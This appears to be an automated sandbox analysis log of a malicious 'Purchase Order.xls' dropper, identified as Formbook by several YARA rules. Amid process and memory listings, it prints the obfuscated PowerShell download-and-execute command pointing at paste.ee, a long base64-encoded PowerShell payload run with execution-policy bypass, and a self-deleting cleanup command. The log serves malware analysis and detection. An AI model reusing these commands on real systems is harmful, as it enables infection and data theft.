              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FEBB021_2_030FEBB0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031803DA21_2_031803DA
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318DBD221_2_0318DBD2
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030FABD821_2_030FABD8
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0317FA2B21_2_0317FA2B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031922AE21_2_031922AE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030CF90021_2_030CF900
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E412021_2_030E4120
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E99BF21_2_030E99BF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318100221_2_03181002
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319E82421_2_0319E824
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030EA83021_2_030EA830
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DB09021_2_030DB090
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F20A021_2_030F20A0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031920A821_2_031920A8
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031928EC21_2_031928EC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0319DFCE21_2_0319DFCE
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03191FF121_2_03191FF1
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318D61621_2_0318D616
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030E6E3021_2_030E6E30
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03192EF721_2_03192EF7
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03192D0721_2_03192D07
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030C0D2021_2_030C0D20
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_03191D5521_2_03191D55
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030F258121_2_030F2581
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_031925DD21_2_031925DD
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030DD5E021_2_030DD5E0
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_030D841F21_2_030D841F
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0318D46621_2_0318D466
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00538C7021_2_00538C70
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00538C6B21_2_00538C6B
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054CD0A21_2_0054CD0A
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00532D9021_2_00532D90
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054CECF21_2_0054CECF
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_0054C7FC21_2_0054C7FC
              Source: C:\Windows\SysWOW64\help.exeCode function: 21_2_00532FB021_2_00532FB0
              Source: Purchase Order.xlsOLE indicator, VBA macros: true
              Source: C:\Windows\SysWOW64\help.exeCode function: String function: 030CB150 appears 87 times
              Source: qMBRkI.exe.8.drStatic PE information: No import functions for PE file found
              Source: Purchase Order.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
              Source: dump.pcap, type: PCAPMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: dump.pcap, type: PCAPMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPEDMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, type: DROPPEDMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 18.0.qMBRkI.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 18.2.qMBRkI.exe.e30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: qMBRkI.exe.8.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: qMBRkI.exe.8.drStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/18@10/5
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_01
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C038F465-43B3-4BAA-ADD5-54E3E8596D12} - OProcSessId.datJump to behavior
              Source: Purchase Order.xlsOLE indicator, Workbook stream: true
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Purchase Order.xlsVirustotal: Detection: 11%
              Source: Purchase Order.xlsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQ
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qMBRkI.exe 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
              Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://paste.ee/r/r87uc')Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAZABSAGgAVQBYAG0AWQBIAFkAbgBPAEkAWgB3AHYAWgBHAEYAbQBGAFYAQwBqAGwARgBOAGQAcAB6AGgAYgBJAGQATABqAGoAewAgAHAAYQByAGEAbQAoACQAaABvAHIAcABBAFIAZwAgACwAIAAkAE4AWgBtAEwAYwBBAHEASQBTAFgAZwAgACwAIAAkAHQAcgBXAFIAdgBLAEsAbABHAHEASgBDAG8AawBJAHcAVQBSAFoAWABlAGcAZwBMAGcAQQBRAEUAUgBDAGcAdgBwACAALAAgACQATgBxAFIAWgB1AHEASAB1AEYAVwBQAGsAWAByAHMAdQBuAEIAeABKAEoATgBMAEwAbAB1AHQARgBVAEUASgBPAE4AQQAgACwAIAAkAFMAZQB2AFgAagBRAGoAYQBKAHYAdwBkAFoATQBXAE8AZgB4AGYAZgBBACAALAAgACQARgBvAHoAdwBCAGEAQgBOAEEAWABYAFQAYQBRAHMAZABPAHQAWgBtAEIAUQBvAFIAVQB0AHgAKQANAAoAJABDAHcAbgBzAGwARgBhAGYAUQBNAEUAVgBQAEwAUABIAHIAVQBiAGkAdwBQAEoASgBpAEgAcQBNAEcAZgBPAE4ATABqAEQAIAA9ACAAJwB5AE4AawB3AEkARwBwAEIAWgAnADsADQAKACQAagBXAE0AQQBsAHEASABCAHQAbQBtAGUASgBkAFAATwBZAGsAIAA9ACAAJwByAEoAZgBIAEYASQBkAGsAZgBaAHAAYQBJAGoATgBYAFQAegBGAHUAWABHAEsAcQBSAFgAVQBFAEcAZwB1AGgARQBEAGgATABFAE8ARwBzAEgARwAnADsADQAKACQAYgBEAE0AZAB1AHYARgB2AE8AVABxAGEAbAB5AG8AcQBpAG4AWgBkAHkAZgBJAFYAIAA9ACAAJwBDAEMAVABFAHQATgAnADsADQAKACQAUgBlAGkAbQBFAHQAYQBJAEEAbABmAE8ATgBkAHcATQBQAFkAWABFAGgAYwBkAHcAdgBxAFkAcgB0AG0AcQBVAEcAIAA9ACAAJwBJAEcAUABDAG0AJwA7AA0ACgAkAE4AUgBjAE4AegB1AEkAYwBHAHAARABnAFcASQBFAHAAQgBsAHIATgBWAGkAUABPAHUATABJAEoAVgBwAHcATgBtAGgAcgAgAD0AIAAnAHoAUAB4AEIAaQB3AGwARABpAEsAeQB4AHoAUwBGACcAOwANAAoAJABLAFkAVQBlAEMATwBTAG4AbQB5AEgAUQBzAHEAdQBvAFIAbgBxAGwAbwBwAGUAWgB3AEwAIAA9ACAAJwBrAE0ASwBLAEMAagBTAEMATgBOAE0ATwBrAHgASgBQAGsAbwBWAEwAcwBQAEoAZgBMAGIAVABxACcAOwANAAoAJAB1AHYAaABxAGgAaABiAGIAbwBFAGcAWgBuAGcAYgBGAFoARgAgAD0AIAAnAGUAYQB1AGsAYgBBAG8AVQBDAGYAeQBhAFEAYwBoAFMAUgBlAFgARABQAGkAbwB2AGsAbwBsAEYAagBpAGEAbABXAGYAJwA7AA0ACgAkAHUAQQBMAEcAcQB0AE0AWQB3AHEAZAAgAD0AIAAnAHgARgBPAEoAYQBCAEMAWgB2AG0AeQBBAG4AUABqACcAOwANAAoAJABVAEUATQBFAGsAUQBuAFMARwBZAGgASgBDAEsAcwBGAEcAWABvAHoAVgBaAEEAawBUAEcAUQBJAEIATABUAGIAIAA9ACAAJwBiAEQAcgBkAFoAZgBnAFMAdgBDACcAOwANAAoAJABVAHQAVwAgAD0AIAAnAHUAcwB0AFAAYQBqAFEAdQBFAGMAawBlAEEAZQBRAHYARgBHAHkAYgBHAEEAYwBnAHIASABoAFoAWAB5AFAAJwA7AA0ACgAkAGoAZgBPAEkAUgBEAEEAYgBLAEoAbgBCAHAAQgBnAG4AZgBHAHcATgB1AHYAZQAgAD0AIAAnAFEATQBYAFQAQwByAFgARgBNAEoAdgBVAFEASABlAEIARwBYAFEAeABOAGIAcgBxAGIAdAB1AFEAQwBDAGcAbgBCAFUAcwBFAGcAaAAnADsADQAKAH0ADQAKACQAVABsAGgAbwBmAEYATABYAFgAYwB1AEgAWABmAGcAZwBwAFYAZwByAEkAeAAgAD0AIAAnAEQASwBkAEkAUwB2AFAAJwA7AA0ACgBJAGYAIAAoACcAVgBaAHkAeABMAGcAbQBNAGsAUQBXAFcAbwBIAHUASQBIAFUAbwBDAGoAegAnACAALQBlAHEAIAAnAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\qMBRkI.exe 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe' Jump to behavior
              Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'Jump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
              Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.387383065.000000000E1C0000.00000002.00000001.sdmp
              Source: Binary string: wntdll.pdbUGP source: qMBRkI.exe, 00000012.00000002.403330072.0000000000E60000.00000040.00000001.sdmp, help.exe, 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp
              Source: Binary string: wntdll.pdb source: qMBRkI.exe, 00000012.00000002.403330072.0000000000E60000.00000040.00000001.sdmp, help.exe
              Source: Binary string: help.pdbGCTL source: qMBRkI.exe, 00000012.00000002.402991598.0000000000BD0000.00000040.00000001.sdmp
              Source: Binary string: help.pdb source: qMBRkI.exe, 00000012.00000002.402991598.0000000000BD0000.00000040.00000001.sdmp
              Source: Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.387383065.000000000E1C0000.00000002.00000001.sdmp

              Data Obfuscation:

              barindex
              Obfuscated command line foundShow sources
